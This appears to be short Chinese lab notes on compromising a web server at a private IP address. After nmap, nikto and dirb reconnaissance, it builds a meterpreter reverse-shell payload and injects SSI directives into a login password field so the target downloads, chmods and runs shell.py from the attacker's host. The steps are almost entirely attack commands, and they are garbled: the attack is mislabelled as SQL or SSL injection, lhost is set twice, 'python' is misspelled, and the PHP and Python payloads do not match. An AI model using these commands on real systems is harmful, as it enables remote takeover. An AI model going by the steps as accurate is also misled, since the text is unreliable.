SQL注入(SSL)

信息探测

扫描主机服务信息以及服务版本

nmap -sV 192.168.101.54

快速扫描主机全部信息

nmap -T4 -A -v  192.168.101.54

探测敏感信息

nikto -host http://192.168.101.54

dirb http://192.168.101.54

登录浏览器:192.168.101.54

根据dirb进行网址挨个探测

根据提示来利用对应SSL注入漏洞

制作webshell
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.101.54 lport=4444 -f raw

gedit shell.py

启动监听
msfconsole
use exploit/multi/handler 
set payload python/meterpreter/reverse_tcp
set lhost 192.168.101.51
set lhost 4444
run

返回浏览器
用户名输入1
密码输入<!--#EXEC cmd="wget http://192.168.101.51/shell.py" --> 

然后将shell复制到/var/www/html中
mv shell.py /var/www/html

再然后开启apache服务
service apache2 start

再次返回浏览器
密码<!--#EXEC cmd="chmod 777 shell.py" -->
密码<!--#EXEC cmd="pthon shell.py" -->

执行操作
sysinfo		查看系统信息
shell		进入系统shell
优化界面
python -c "import pty;pty.spawn('/bin/bash')"

你可能感兴趣的:(网络安全,ssl,网络协议,网络,web安全)